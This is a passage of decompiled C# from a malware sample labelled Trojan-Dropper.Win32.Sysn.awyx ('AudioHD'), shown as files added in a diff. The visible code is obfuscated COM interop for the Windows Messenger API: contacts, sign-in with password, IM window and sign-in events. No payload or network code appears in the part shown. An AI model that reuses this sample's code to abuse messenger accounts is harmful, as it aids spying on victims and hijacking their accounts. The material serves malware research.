+    new void \u0001([In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    new string MyServiceId { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new object Services { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    \u0003.\u0003 ContactsSortOrder { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0004([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    object MyGroups { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrName, [MarshalAs(UnmanagedType.Struct), In] object vService);
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0003.cs

@@ -0,0 +1,15 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0003
+{
+  internal enum \u0003
+  {
+    \u0001,
+    \u0002,
+    \u0003,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0004.cs

@@ -0,0 +1,133 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0003
+{
+  [Guid("01FE33C6-8FE4-4361-B32F-1F31AEA790E5")]
+  [ComImport]
+  public interface \u0004 : \u0003.\u0002
+  {
+    new object Window { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    new string ReceiveFileDirectory { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrAppID);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0002();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrFileName);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0003();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrPassword);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrServiceId);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [In] \u0005 MOPTIONPAGE);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrEMail);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001(
+      [In] int hwndParent,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrFirstName,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrLastName,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCity,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrState,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCountry);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [In] \u0006 ePhoneNumber, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0003([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0004();
+
+    new object MyContacts { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    new string MySigninName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new string MyFriendlyName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new \u0007 MyStatus { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new int \u0001([In] \u0008 mFolder);
+
+    new string MyServiceName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.BStr)]
+    new string \u0001([In] \u0006 PhoneType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.Struct)]
+    new object \u0001([In] \u0001 ePropType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    new string MyServiceId { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new object Services { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    new \u0003.\u0003 ContactsSortOrder { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0004([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    new object MyGroups { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrName, [MarshalAs(UnmanagedType.Struct), In] object vService);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.Struct)]
+    object \u0001([In] \u0005 ePropType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] \u0005 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0005.cs

@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0003
+{
+  internal enum \u0005
+  {
+    \u0001,
+    \u0002,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0006.cs

@@ -0,0 +1,45 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0003
+{
+  [Guid("9B7B6E54-9417-4CF1-9B6A-A469EFC20A56")]
+  [ComImport]
+  public interface \u0006
+  {
+    string FriendlyName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    \u0007 Status { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    string SigninName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    string ServiceName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    bool Blocked { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; }
+
+    bool CanPage { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.BStr)]
+    string \u0002([In] \u0006 PhoneType);
+
+    bool IsSelf { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.Struct)]
+    object \u0002([In] \u0001 ePropType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0002([In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    string ServiceId { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0007.cs

@@ -0,0 +1,33 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Collections;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Runtime.InteropServices.CustomMarshalers;
+
+namespace \u0003
+{
+  [Guid("03DFA498-BD30-467B-9E41-B69F8DD252AF")]
+  [DefaultMember("Item")]
+  [ComImport]
+  public interface \u0007 : IEnumerable
+  {
+    int Count { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object Item([In] int Index);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0003([MarshalAs(UnmanagedType.IDispatch), In] object pMContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.CustomMarshaler, MarshalTypeRef = typeof (EnumeratorToEnumVariantMarshaler))]
+    new IEnumerator GetEnumerator();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0008.cs

@@ -0,0 +1,320 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using \u0004;
+using \u0005;
+using \u0006;
+using \u0007;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0003
+{
+  [Guid("F81CD990-910B-4BBF-9CB3-6A77F3D697B3")]
+  [ComImport]
+  public sealed class \u0008 : \u0001, \u0007.\u0004, \u0003.\u0004
+  {
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public extern \u0008();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0001();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrAppID);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0002();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrFileName);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0003();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrPassword);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrServiceId);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] int hwndParent, [In] \u0002.\u0005 MOPTIONPAGE);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrEMail);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001(
+      [In] int hwndParent,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrFirstName,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrLastName,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCity,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrState,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCountry);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [In] \u0002.\u0006 ePhoneNumber, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] int hwndParent);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0003([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0004();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0002();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0002();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0003();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] \u0002.\u0007 pmStatus);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern \u0002.\u0007 \u0001();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern int \u0001([In] \u0008 mFolder);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0004();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0001([In] \u0002.\u0006 PhoneType);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([In] \u0001 ePropType);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern string \u0005();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0003();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern \u0003.\u0003 \u0001();
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] \u0003.\u0003 pSort);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0004([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0004();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrName, [MarshalAs(UnmanagedType.Struct), In] object vService);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern object \u0001([In] \u0003.\u0005 ePropType);
+
+    [SpecialName]
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void \u0001([In] \u0003.\u0005 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnGroupAdded([In] \u0004.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnGroupAdded([In] \u0004.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnGroupRemoved([In] \u0004.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnGroupRemoved([In] \u0004.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnGroupNameChanged([In] \u0004.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnGroupNameChanged([In] \u0004.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactAddedToGroup([In] \u0004.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactAddedToGroup([In] \u0004.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactRemovedFromGroup([In] \u0004.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactRemovedFromGroup([In] \u0004.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnIMWindowCreated([In] \u0004.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnIMWindowCreated([In] \u0004.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnIMWindowDestroyed([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnIMWindowDestroyed([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnIMWindowContactAdded([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnIMWindowContactAdded([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnIMWindowContactRemoved([In] \u0005.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnIMWindowContactRemoved([In] \u0005.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnAppShutdown([In] \u0005.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnAppShutdown([In] \u0005.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnSignin([In] \u0005.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnSignin([In] \u0005.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnSignout([In] \u0005.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnSignout([In] \u0005.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactListAdd([In] \u0005.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactListAdd([In] \u0005.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactListRemove([In] \u0005.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactListRemove([In] \u0005.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnMyFriendlyNameChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnMyFriendlyNameChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnMyStatusChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
